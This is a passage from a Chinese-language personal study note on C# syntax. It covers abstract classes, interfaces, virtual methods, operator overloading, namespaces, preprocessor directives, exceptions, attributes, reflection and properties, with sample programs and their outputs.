      • 接口: 是一种引用类型,定义了一个类或结构体必须遵循的一组方法和属性的契约。接口只能包含方法、属性、事件和索引器的声明,且不能包含任何实现。类通过实现接口来保证其提供了接口定义的所有成员。
    2. 多继承:
      • 抽象类: C# 中不支持多继承,一个类只能继承自一个抽象类(或具体类)。抽象类本身可以实现多个接口。
      • 接口: 支持多重继承,一个类可以实现多个接口。这使得接口在定义类的行为时更加灵活。
    3. 成员实现:
      • 抽象类: 可以包含方法的实现,子类可以选择性地重写这些方法。
      • 接口: 不能包含方法的实现,只能定义方法的签名。
    4. 字段和常量:
      • 抽象类: 可以包含字段(字段可以是私有的、受保护的等),也可以包含常量字段。
      • 接口: 不能包含字段,只能包含常量。
    5. 设计层次:
      • 抽象类: 通常用于描述一种“是什么”的关系,即表示一种基本的类型或概念,并且希望子类扩展其功能。
      • 接口: 通常用于描述一种“能做什么”的能力,即规定了一组行为或功能,类通过实现接口来表明自己具有这些能力。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    using System;
    namespace PolymorphismApplication
    {
    abstract class Shape
    {
    abstract public int area(); // 标记为 abstract 的函数只可声明,不可定义实现
    }

    class Rectangle : Shape
    {
    private int length;
    private int width;
    public Rectangle(int a = 0, int b = 0)
    {
    length = a;
    width = b;
    }
    public override int area() // 若要实现继承所定义的函数,使用 override 标记
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * length);
    }
    }

    class RectangleTester
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(10, 7);
    double a = r.area();
    Console.WriteLine("面积: {0}", a);
    Console.ReadKey();
    }
    }
    }
    1
    2
    Rectangle 类的面积:
    面积: 70

    ​当有一个定义在类中的函数需要在继承类中实现时,可以使用虚方法(与 abstract 相比,virtual 可以在基类中定义实现)。

    • 虚方法是使用关键字 virtual 声明的。

    • 虚方法可以在不同的继承类中有不同的实现。

    • 对虚方法的调用是在运行时发生的。

    • 动态多态性是通过 抽象类虚方法 实现的。

    ​以下实例创建了 Shape 基类,并创建派生类 Circle、 Rectangle、Triangle, Shape 类提供一个名为 Draw 的虚拟方法,在每个派生类中重写该方法以绘制该类的指定形状。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    using System;
    using System.Collections.Generic;

    public abstract class Shape
    {
    public int X { get; private set; }
    public int Y { get; private set; }
    public int Height { get; set; }
    public int Width { get; set; }

    // 虚方法
    public virtual void Draw()
    {
    Console.WriteLine("执行基类的画图任务");
    }
    }

    class Circle : Shape
    {
    public override void Draw() // 同样使用 override
    {
    Console.WriteLine("画一个圆形");
    base.Draw();
    }
    }
    class Rectangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个长方形");
    base.Draw();
    }
    }
    class Triangle : Shape
    {
    public override void Draw()
    {
    Console.WriteLine("画一个三角形");
    base.Draw();
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    // 创建一个 List<Shape> 对象,并向该对象添加 Circle、Triangle 和 Rectangle
    var shapes = new List<Shape>
    {
    new Rectangle(),
    new Triangle(),
    new Circle()
    };

    // 使用 foreach 循环对该列表的派生类进行循环访问,并对其中的每个 Shape 对象调用 Draw 方法
    foreach (var shape in shapes)
    {
    shape.Draw();
    }

    Console.WriteLine("按下任意键退出。");
    Console.ReadKey();
    }

    }
    1
    2
    3
    4
    5
    6
    7
    画一个长方形
    执行基类的画图任务
    画一个三角形
    执行基类的画图任务
    画一个圆形
    执行基类的画图任务
    按下任意键退出。

    ​下面的程序演示通过虚方法 area() 来计算不同形状图像的面积(同样的语句,底层执行不同的代码):

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    using System;
    namespace PolymorphismApplication
    {
    class Shape
    {
    protected int width, height;
    public Shape( int a=0, int b=0)
    {
    width = a;
    height = b;
    }
    public virtual int area()
    {
    Console.WriteLine("父类的面积:");
    return 0;
    }
    }
    class Rectangle: Shape
    {
    public Rectangle( int a=0, int b=0): base(a, b)
    {

    }
    public override int area ()
    {
    Console.WriteLine("Rectangle 类的面积:");
    return (width * height);
    }
    }
    class Triangle: Shape
    {
    public Triangle(int a = 0, int b = 0): base(a, b)
    {

    }
    public override int area()
    {
    Console.WriteLine("Triangle 类的面积:");
    return (width * height / 2);
    }
    }
    class Caller
    {
    public void CallArea(Shape sh)
    {
    int a;
    a = sh.area();
    Console.WriteLine("面积: {0}", a);
    }
    }
    class Tester
    {

    static void Main(string[] args)
    {
    Caller c = new Caller();
    Rectangle r = new Rectangle(10, 7);
    Triangle t = new Triangle(10, 5);
    c.CallArea(r);
    c.CallArea(t);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    Rectangle 类的面积:
    面积: 70
    Triangle 类的面积:
    面积: 25

    C# 运算符重载

    您可以重定义或重载 C# 中内置的运算符。因此,程序员也可以使用用户自定义类型的运算符。重载运算符是具有特殊名称的函数,是通过关键字 operator 后跟运算符的符号来定义的。与其他函数一样,重载运算符有返回类型和参数列表。

    运算符重载的实现

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    using System;

    namespace OperatorOvlApplication
    {
    class Box
    {
    private double length; // 长度
    private double breadth; // 宽度
    private double height; // 高度

    public double getVolume()
    {
    return length * breadth * height;
    }
    public void setLength( double len )
    {
    length = len;
    }

    public void setBreadth( double bre )
    {
    breadth = bre;
    }

    public void setHeight( double hei )
    {
    height = hei;
    }
    // 重载 + 运算符来把两个 Box 对象相加
    public static Box operator+ (Box b, Box c)
    {
    Box box = new Box();
    box.length = b.length + c.length;
    box.breadth = b.breadth + c.breadth;
    box.height = b.height + c.height;
    return box;
    }

    }

    class Tester
    {
    static void Main(string[] args)
    {
    Box Box1 = new Box(); // 声明 Box1,类型为 Box
    Box Box2 = new Box(); // 声明 Box2,类型为 Box
    Box Box3 = new Box(); // 声明 Box3,类型为 Box
    double volume = 0.0; // 体积

    // Box1 详述
    Box1.setLength(6.0);
    Box1.setBreadth(7.0);
    Box1.setHeight(5.0);

    // Box2 详述
    Box2.setLength(12.0);
    Box2.setBreadth(13.0);
    Box2.setHeight(10.0);

    // Box1 的体积
    volume = Box1.getVolume();
    Console.WriteLine("Box1 的体积: {0}", volume);

    // Box2 的体积
    volume = Box2.getVolume();
    Console.WriteLine("Box2 的体积: {0}", volume);

    // 把两个对象相加
    Box3 = Box1 + Box2;

    // Box3 的体积
    volume = Box3.getVolume();
    Console.WriteLine("Box3 的体积: {0}", volume);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    Box1 的体积: 210
    Box2 的体积: 1560
    Box3 的体积: 5400

    可重载和不可重载运算符

    运算符描述
    +, -, !, ~, ++, –这些一元运算符只有一个操作数,且可以被重载
    +, -, *, /, %这些二元运算符带有两个操作数,且可以被重载
    ==, !=, <, >, <=, >=这些比较运算符可以被重载
    &&, ||这些条件逻辑运算符不能被直接重载。
    +=, -=, *=, /=, %=这些赋值运算符不能被重载。
    =, ., ?:, ->, new, is, sizeof, typeof这些运算符不能被重载。

    C# 接口(Interface)

    • 接口定义了所有类继承接口时应遵循的语法合同。接口定义了语法合同 “是什么” 部分,派生类定义了语法合同 “怎么做” 部分。

    • 接口定义了属性、方法和事件,这些都是接口的成员。接口只包含了成员的声明。成员的定义是派生类的责任。接口提供了派生类应遵循的标准结构

    • 接口使得实现接口的类或结构在形式上保持一致。

    • 抽象类在某种程度上与接口类似,但是,它们大多只是用在当只有少数方法由基类声明由派生类实现时。

    • 接口本身并不实现任何功能,它只是和声明实现该接口的对象订立一个必须实现哪些行为的契约。

    • 抽象类不能直接实例化,但允许派生出具体的,具有实际功能的类。


    ​接口使用 interface 关键字声明,它与类的声明类似。接口声明默认是 public 的。下面是一个接口声明的实例:

    ​以上代码定义了接口 IMyInterface。通常接口命令以 I 字母开头,这个接口只有一个方法 MethodToImplement(),没有参数和返回值,当然我们可以按照需求设置参数和返回值。

    ​值得注意的是,该方法并没有具体的实现。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    using System;

    interface IMyInterface
    {
    // 接口成员
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }
    }
    1
    MethodToImplement() called.

    ​以下实例定义了两个接口 IMyInterfaceIParentInterface

    ​(接口可以继承其他接口)如果一个接口继承其他接口,那么实现类或结构就需要实现所有接口的成员。

    ​以下实例 IMyInterface 继承了 IParentInterface 接口,因此接口实现类必须实现 MethodToImplement()ParentInterfaceMethod() 方法:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    using System;

    interface IParentInterface
    {
    void ParentInterfaceMethod();
    }

    interface IMyInterface : IParentInterface
    {
    void MethodToImplement();
    }

    class InterfaceImplementer : IMyInterface
    {
    static void Main()
    {
    InterfaceImplementer iImp = new InterfaceImplementer();
    iImp.MethodToImplement();
    iImp.ParentInterfaceMethod();
    }

    public void MethodToImplement()
    {
    Console.WriteLine("MethodToImplement() called.");
    }

    public void ParentInterfaceMethod()
    {
    Console.WriteLine("ParentInterfaceMethod() called.");
    }
    }
    1
    2
    MethodToImplement() called.
    ParentInterfaceMethod() called.

    C# 命名空间(Namespace)

    命名空间的设计目的是提供一种让一组名称与其他名称分隔开的方式在一个命名空间中声明的类的名称与另一个命名空间中声明的相同的类的名称不冲突

    ​我们举一个计算机系统中的例子,一个文件夹(目录)中可以包含多个文件夹,每个文件夹中不能有相同的文件名,但不同文件夹中的文件可以重名。

    定义命名空间
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    using System;

    namespace first_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class namespace_cl
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    first_space.namespace_cl fc = new first_space.namespace_cl();
    second_space.namespace_cl sc = new second_space.namespace_cl();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    1
    2
    Inside first_space
    Inside second_space
    using 关键字

    using 关键字表明程序使用的是给定命名空间中的名称。例如,我们在程序中使用 System 命名空间,其中定义了类 Console。我们可以只写:

    1
    Console.WriteLine ("Hello there");

    ​我们可以写完全限定名称,如下:

    1
    System.Console.WriteLine("Hello there");

    ​您也可以使用 using 命名空间指令,这样在使用的时候就不用在前面加上命名空间名称。(类似于 C++ 里的 using namespace std;

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    using System;
    using first_space;
    using second_space;

    namespace first_space
    {
    class abc
    {
    public void func()
    {
    Console.WriteLine("Inside first_space");
    }
    }
    }
    namespace second_space
    {
    class efg
    {
    public void func()
    {
    Console.WriteLine("Inside second_space");
    }
    }
    }
    class TestClass
    {
    static void Main(string[] args)
    {
    abc fc = new abc();
    efg sc = new efg();
    fc.func();
    sc.func();
    Console.ReadKey();
    }
    }
    1
    2
    Inside first_space
    Inside second_space
    嵌套命名空间

    ​命名空间可以被嵌套,即您可以在一个命名空间内定义另一个命名空间,如下所示:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    using System;
    using SomeNameSpace;
    using SomeNameSpace.Nested;

    namespace SomeNameSpace
    {
    public class MyClass
    {
    static void Main()
    {
    Console.WriteLine("In SomeNameSpace");
    Nested.NestedNameSpaceClass.SayHello();
    }
    }

    // 内嵌命名空间
    namespace Nested
    {
    public class NestedNameSpaceClass
    {
    public static void SayHello()
    {
    Console.WriteLine("In Nested");
    }
    }
    }
    }

    C# 预处理器指令

    预处理器指令(Preprocessor Directives)指导编译器在实际编译开始之前对信息进行预处理

    ​通过这些指令,可以控制编译器如何编译文件或编译哪些部分。常见的预处理器指令包括条件编译、宏定义等。

    ​所有的预处理器指令都是以 # 开始,且在一行上,只有空白字符可以出现在预处理器指令之前。

    ​预处理器指令不是语句,所以它们不以分号 ; 结束。

    ​C# 编译器没有一个单独的预处理器,但是,指令被处理时就像是有一个单独的预处理器一样。在 C# 中,预处理器指令用于在条件编译中起作用。与 C 和 C++ 不同的是,它们不是用来创建宏。一个预处理器指令必须是该行上的唯一指令。

    C# 预处理器指令列表

    ​下表列出了 C# 中可用的预处理器指令:

    指令描述
    #define定义一个符号,可以用于条件编译。
    #undef取消定义一个符号。
    #if开始一个条件编译块,如果符号被定义则包含代码块。
    #elif如果前面的 #if#elif 条件不满足,且当前条件满足,则包含代码块。
    #else如果前面的 #if#elif 条件不满足,则包含代码块。
    #endif结束一个条件编译块。
    #warning生成编译器警告信息。
    #error生成编译器错误信息。
    #region标记一段代码区域,可以在 IDE 中折叠和展开这段代码,便于代码的组织和阅读。
    #endregion结束一个代码区域。
    #line更改编译器输出中的行号和文件名,可以用于调试或生成工具的代码。
    #pragma用于给编译器发送特殊指令,例如禁用或恢复特定的警告。
    #nullable控制可空性上下文和注释,允许启用或禁用对可空引用类型的编译器检查。

    #define 和 #undef 预处理器

    #define 用于定义符号(通常用于条件编译),#undef 用于取消定义符号。

    1
    2
    3
    #define DEBUG

    #undef RELEASE

    ​#define 允许您定义一个符号,这样,通过使用符号作为传递给 #if 指令的表达式,表达式将返回 true。它的语法如下:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    #define PI 
    using System;
    namespace PreprocessorDAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    #if (PI)
    Console.WriteLine("PI is defined");
    #else
    Console.WriteLine("PI is not defined");
    #endif
    Console.ReadKey();
    }
    }
    }
    1
    PI is defined

    条件指令:#if, #elif, #else 和 #endif

    ​您可以使用 #if 指令来创建一个条件指令。

    ​条件指令用于测试符号是否为真。如果为真,编译器会执行 #if 和下一个指令之间的代码。

    ​条件指令的语法:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    #define DEBUG
    #define VC_V10
    using System;
    public class TestClass
    {
    public static void Main()
    {

    #if (DEBUG && !VC_V10)
    Console.WriteLine("DEBUG is defined");
    #elif (!DEBUG && VC_V10)
    Console.WriteLine("VC_V10 is defined");
    #elif (DEBUG && VC_V10)
    Console.WriteLine("DEBUG and VC_V10 are defined");
    #else
    Console.WriteLine("DEBUG and VC_V10 are not defined");
    #endif
    Console.ReadKey();
    }
    }
    1
    DEBUG and VC_V10 are defined

    #pragma

    ​用于向编译器发送特殊指令。最常见的用法是禁用特定的警告。

    1
    2
    3
    #pragma warning disable 414
    private int unusedVariable;
    #pragma warning restore 414

    使用预处理器指令的注意事项

    • 提高代码可读性:使用 #region 可以帮助分隔代码块,提高代码的组织性。
    • 条件编译:通过 #if 等指令可以在开发和生产环境中编译不同的代码,方便调试和发布。
    • 警告和错误:通过 #warning#error 可以在编译时提示开发人员注意特定问题。

    ​通过正确使用这些预处理器指令,可以更好地控制代码的编译过程,提高代码的灵活性和可维护性。

    C# 正则表达式

    ​其实我觉得可以用 ChatGPT 帮自己写正则表达式。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    using System;
    using System.Text.RegularExpressions;

    public class Example
    {
    public static void Main()
    {
    string input = "1851 1999 1950 1905 2003";
    string pattern = @"(?<=19)\d{2}\b";

    foreach (Match match in Regex.Matches(input, pattern))
    Console.WriteLine(match.Value);
    }
    }
    1
    2
    3
    99
    50
    05

    C# 异常处理

    ​异常是在程序执行期间出现的问题。C# 中的异常是对程序运行时出现的特殊情况的一种响应,比如尝试除以零。

    ​异常提供了一种把程序控制权从某个部分转移到另一个部分的方式。C# 异常处理时建立在四个关键词之上的:trycatchfinallythrow

    • try:一个 try 块标识了一个将被激活的特定的异常的代码块。后跟一个或多个 catch 块。
    • catch:程序通过异常处理程序捕获异常。catch 关键字表示异常的捕获。
    • finally:finally 块用于执行给定的语句,不管异常是否被抛出都会执行。例如,如果您打开一个文件,不管是否出现异常文件都要被关闭。
    • throw:当问题出现时,程序抛出一个异常。使用 throw 关键字来完成。

    C# 中的异常类

    ​C# 异常是使用类来表示的。C# 中的异常类主要是直接或间接地派生于 System.Exception 类。System.ApplicationExceptionSystem.SystemException 类是派生于 System.Exception 类的异常类。

    • System.ApplicationException 类支持由应用程序生成的异常。所以程序员定义的异常都应派生自该类。

    • System.SystemException 类是所有预定义的系统异常的基类。

    ​下表列出了一些派生自 System.SystemException 类的预定义的异常类:

    异常类描述
    System.IO.IOException处理 I/O 错误。
    System.IndexOutOfRangeException处理当方法指向超出范围的数组索引时生成的错误。
    System.ArrayTypeMismatchException处理当数组类型不匹配时生成的错误。
    System.NullReferenceException处理当依从一个空对象时生成的错误。
    System.DivideByZeroException处理当除以零时生成的错误。
    System.InvalidCastException处理在类型转换期间生成的错误。
    System.OutOfMemoryException处理空闲内存不足生成的错误。
    System.StackOverflowException处理栈溢出生成的错误。

    异常处理

    ​C# 以 try 和 catch 块的形式提供了一种结构化的异常处理方案。使用这些块,把核心程序语句与错误处理语句分离开。

    ​这些错误处理块是使用 trycatch(若发生异常,执行)和 finally(无论是否有异常,均执行)关键字实现的。下面是一个当除以零时抛出异常的实例:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    using System;
    namespace ErrorHandlingApplication
    {
    class DivNumbers
    {
    int result;
    DivNumbers()
    {
    result = 0;
    }
    public void division(int num1, int num2)
    {
    try
    {
    result = num1 / num2;
    }
    catch (DivideByZeroException e)
    {
    Console.WriteLine("Exception caught: {0}", e);
    }
    finally
    {
    Console.WriteLine("Result: {0}", result);
    }

    }
    static void Main(string[] args)
    {
    DivNumbers d = new DivNumbers();
    d.division(25, 0);
    d.division(25, 5);
    Console.ReadKey();
    }
    }
    }
    1
    2
    3
    4
    Exception caught: System.DivideByZeroException: 尝试除以零。
    在 ErrorHandlingApplication.DivNumbers.division(Int32 num1, Int32 num2) 位置 XXX.cs:行号 15
    Result: 0
    Result: 5
    创建用户自定义异常

    ​您也可以定义自己的异常。用户自定义的异常类是派生自 ApplicationException 类。使用 throw 来抛出异常。下面的实例演示了这点:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    using System;
    namespace UserDefinedException
    {
    class TestTemperature
    {
    static void Main(string[] args)
    {
    Temperature temp = new Temperature();
    try
    {
    temp.showTemp();
    }
    catch (TempIsZeroException e)
    {
    Console.WriteLine("TempIsZeroException: {0}", e.Message);
    }
    Console.ReadKey();
    }
    }
    }
    public class TempIsZeroException : ApplicationException
    {
    public TempIsZeroException(string message) : base(message)
    {
    }
    }
    public class Temperature
    {
    int temperature = 0;
    public void showTemp()
    {
    if (temperature == 0)
    {
    throw (new TempIsZeroException("Zero Temperature found"));
    }
    else
    {
    Console.WriteLine("Temperature: {0}", temperature);
    }
    }
    }
    1
    TempIsZeroException: Zero Temperature found
    抛出对象

    ​如果异常是直接或间接派生自 System.Exception 类,您可以抛出一个对象。您可以在 catch 块中使用 throw 语句来抛出当前的对象,如下所示:

    1
    2
    3
    4
    5
    Catch(Exception e)
    {
    ...
    Throw e
    }

    C# 文件的输入与输出

    ​一个 文件 是一个存储在磁盘中带有指定名称和目录路径的数据集合。当打开文件进行读写时,它变成一个

    ​从根本上说,流是通过通信路径传递的字节序列。有两个主要的流:输入流输出流输入流用于从文件读取数据(读操作),输出流用于向文件写入数据(写操作)。

    FileStream 类

    System.IO 命名空间中的 FileStream 类有助于文件的读写与关闭。该类派生自抽象类 Stream。

    ​您需要创建一个 FileStream 对象来创建一个新的文件,或打开一个已有的文件。


    ​具体地问 ChatGPT 吧……

    高级语法

    C# 特性

    ​Unity 里比较常用。

    ​**特性(Attribute)**是用于在运行时传递程序中各种元素(比如类、方法、结构、枚举、组件等)的行为信息的声明性标签。您可以通过使用特性向程序添加声明性信息。一个声明性标签是通过放置在它所应用的元素前面的方括号([ ])来描述的。

    ​特性(Attribute)用于添加元数据,如编译器指令和注释、描述、方法、类等其他信息。.Net 框架提供了两种类型的特性:预定义特性和自定义特性。

    预定义特性(Attribute)

    ​.Net 框架提供了三种预定义特性:

    • AttributeUsage

      • 预定义特性 AttributeUsage 描述了如何使用一个自定义特性类。它规定了特性可应用到的项目的类型。
    • Conditional

      • 这个预定义特性标记了一个条件方法,其执行依赖于指定的预处理标识符。

        它会引起方法调用的条件编译,取决于指定的值,比如 DebugTrace。例如,当调试代码时显示变量的值。

    • Obsolete

      • 这个预定义特性标记了不应被使用的程序实体。它可以让您通知编译器丢弃某个特定的目标元素。例如,当一个新方法被用在一个类中,但是您仍然想要保持类中的旧方法,您可以通过显示一个应该使用新方法,而不是旧方法的消息,来把它标记为 obsolete(过时的)。

    创建自定义特性(Attribute)

    ​一个新的自定义特性应派生自 System.Attribute 类。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    // 一个自定义特性 BugFix 被赋给类及其成员
    using System;

    [AttributeUsage(AttributeTargets.Class |
    AttributeTargets.Constructor |
    AttributeTargets.Field |
    AttributeTargets.Method |
    AttributeTargets.Property,
    AllowMultiple = true)]

    public class DeBugInfo : System.Attribute
    {
    private int bugNo;
    private string developer;
    private string lastReview;
    public string message;

    public DeBugInfo(int bg, string dev, string d)
    {
    this.bugNo = bg;
    this.developer = dev;
    this.lastReview = d;
    }

    public int BugNo
    {
    get
    {
    return bugNo;
    }
    }
    public string Developer
    {
    get
    {
    return developer;
    }
    }
    public string LastReview
    {
    get
    {
    return lastReview;
    }
    }
    public string Message
    {
    get
    {
    return message;
    }
    set
    {
    message = value;
    }
    }
    }

    [DeBugInfo(45, "Zara Ali", "12/8/2012", Message = "Return type mismatch")]
    [DeBugInfo(49, "Nuha Ali", "10/10/2012", Message = "Unused variable")]
    class Rectangle
    {
    // 成员变量
    protected double length;
    protected double width;
    public Rectangle(double l, double w)
    {
    length = l;
    width = w;
    }
    [DeBugInfo(55, "Zara Ali", "19/10/2012",
    Message = "Return type mismatch")]
    public double GetArea()
    {
    return length * width;
    }
    [DeBugInfo(56, "Zara Ali", "19/10/2012")]
    public void Display()
    {
    Console.WriteLine("Length: {0}", length);
    Console.WriteLine("Width: {0}", width);
    Console.WriteLine("Area: {0}", GetArea());
    }
    }

    class Program
    {
    static void Main(string[] args)
    {
    Rectangle r = new Rectangle(5, 8);
    r.Display();
    }
    }
    1
    2
    3
    Length: 5
    Width: 8
    Area: 40

    C# 反射(Reflection)

    ​反射指程序可以访问、检测和修改它本身状态或行为的一种能力。

    ​程序集包含模块,而模块包含类型,类型又包含成员。反射则提供了封装程序集、模块和类型的对象。

    ​您可以使用反射动态地创建类型的实例,将类型绑定到现有对象,或从现有对象中获取类型。然后,可以调用类型的方法或访问其字段和属性。

    优缺点

    优点:

    • 1、反射提高了程序的灵活性和扩展性。
    • 2、降低耦合性,提高自适应能力。
    • 3、它允许程序创建和控制任何类的对象,无需提前硬编码目标类。

    缺点:

    • 1、性能问题:使用反射基本上是一种解释操作,用于字段和方法接入时要远慢于直接代码。因此反射机制主要应用在对灵活性和拓展性要求很高的系统框架上,普通程序不建议使用。
    • 2、使用反射会模糊程序内部逻辑;程序员希望在源代码中看到程序的逻辑,反射却绕过了源代码的技术,因而会带来维护的问题,反射代码比相应的直接代码更复杂。

    反射(Reflection)的用途

    ​反射(Reflection)有下列用途:

    • 它允许在运行时查看特性(attribute)信息。
    • 它允许审查集合中的各种类型,以及实例化这些类型。
    • 它允许延迟绑定的方法和属性(property)。
    • 它允许在运行时创建新类型,然后使用这些类型执行一些任务。
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    using System;

    [AttributeUsage(AttributeTargets.All)]
    public class HelpAttribute : System.Attribute
    {
    public readonly string Url;

    public string Topic // Topic 是一个命名(named)参数
    {
    get
    {
    return topic;
    }
    set
    {

    topic = value;
    }
    }

    public HelpAttribute(string url) // url 是一个定位(positional)参数
    {
    this.Url = url;
    }

    public override string ToString()
    {
    return base.ToString() + ": "+ this.Url;
    }

    private string topic;
    }
    [HelpAttribute("Information on the class MyClass")]
    class MyClass
    {
    }

    namespace AttributeAppl
    {
    class Program
    {
    static void Main(string[] args)
    {
    System.Reflection.MemberInfo info = typeof(MyClass);
    object[] attributes = info.GetCustomAttributes(true);
    for (int i = 0; i < attributes.Length; i++)
    {
    System.Console.WriteLine(attributes[i]);
    }
    Console.ReadKey();

    }
    }
    }
    1
    HelpAttribute: Information on the class MyClass

    C# 属性(Property)

    属性(Property) 是类(class)、结构(structure)和接口(interface)的命名(named)成员。类或结构中的成员变量或方法称为 域(Field)。属性(Property)是域(Field)的扩展,且可使用相同的语法来访问。它们使用 访问器(accessors) 让私有域的值可被读写或操作。

    ​属性(Property)不会确定存储位置。相反,它们具有可读写或计算它们值的 访问器(accessors)

    ​例如,有一个名为 Student 的类,带有 age、name 和 code 的私有域。我们不能在类的范围以外直接访问这些域,但是我们可以拥有访问这些私有域的属性

    访问器(Accessors)

    ​属性(Property)的访问器(accessor)包含有助于获取(读取或计算)或设置(写入)属性的可执行语句。访问器(accessor)声明可包含一个 get 访问器一个 set 访问器,或者同时包含二者。例如:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    using System;
    namespace runoob
    {
    class Student
    {

    private string code = "N.A";
    private string name = "not known";
    private int age = 0;

    // 声明类型为 string 的 Code 属性
    public string Code
    {
    get
    {
    return code;
    }
    set
    {
    code = value;
    }
    }

    // 声明类型为 string 的 Name 属性
    public string Name
    {
    get
    {
    return name;
    }
    set
    {
    name = value;
    }
    }

    // 声明类型为 int 的 Age 属性
    public int Age
    {
    get
    {
    return age;
    }
    set
    {
    age = value;
    }
    }
    public override string ToString()
    {
    return "Code = " + Code + ", Name = " + Name + ", Age = " + Age;
    }
    }
    class ExampleDemo
    {
    public static void Main()
    {
    // 创建一个新的 Student 对象
    Student s = new Student();

    // 设置 student 的 code、name 和 age
    s.Code = "001";
    s.Name = "Zara";
    s.Age = 9;
    Console.WriteLine("Student Info: {0}", s);
    // 增加年龄
    s.Age += 1;
    Console.WriteLine("Student Info: {0}", s);
    Console.ReadKey();
    }
    }
    }
    1
    2
    Student Info: Code = 001, Name = Zara, Age = 9
    Student Info: Code = 001, Name = Zara, Age = 10

    ​在这段代码中,将 codenameage 设为私有字段,并通过公共属性 CodeNameAge 进行访问的做法,比直接将它们设为公共字段(public fields)有几个优势:

    1. 封装性和安全性: 使用属性可以提供更好的封装性,隐藏了实现细节(私有字段 codenameage),并且可以在属性的 getter 和 setter 方法中添加额外的逻辑。例如,可以在 setter 中验证输入值的有效性或执行特定的逻辑。
